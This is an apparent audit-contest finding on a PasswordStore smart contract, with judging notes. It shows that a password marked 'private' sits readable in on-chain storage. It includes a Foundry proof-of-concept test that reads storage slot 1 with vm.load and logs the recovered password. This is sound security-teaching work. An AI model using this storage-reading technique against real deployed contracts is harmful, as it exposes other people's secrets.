Submission Details
Severity:
Passwords are visible on-chain to everyone
Summary
Confidential information, such as a password, shouldn't be stored on the chain, as it is still visible to everyone even though the variable is marked as private
Vulnerability Details
Anyone could still view the owner's password, POC as below:
$ forge test --match-test "test_non_owner_get_password" -vvv
function test_non_owner_get_password() public {
// A non-owner can access the password by accessing storage data,
// The 's_password' is located at storage slot index #1
vm.startPrank(owner);
passwordStore.setPassword("InsecurePassword");
vm.prank(address(1));
bytes32 bytesPassword = vm.load(
address(passwordStore),
bytes32(uint256(1))
);
string memory stringPassword = string(abi.encodePacked(bytesPassword));
console.logString(stringPassword);
}
Running 1 test for test/PasswordStore.t.sol:PasswordStoreTest
[PASS] test_non_owner_get_password() (gas: 20893)
Logs:
InsecurePassword
Impact
Anyone could see the owner's password.
Tools Used
Foundry and manual inspection.
Recommendations
Do not store confidential information such as passwords or private keys on the blockchain.
Updates
Lead Judging Commences
inallhonesty
about 2 years ago
inallhonesty about 2 years ago
Submission Judgement Published Assigned finding tags:
finding-anyone-can-read-storage
Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential
Rewards breakdown
nSLOC
20This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.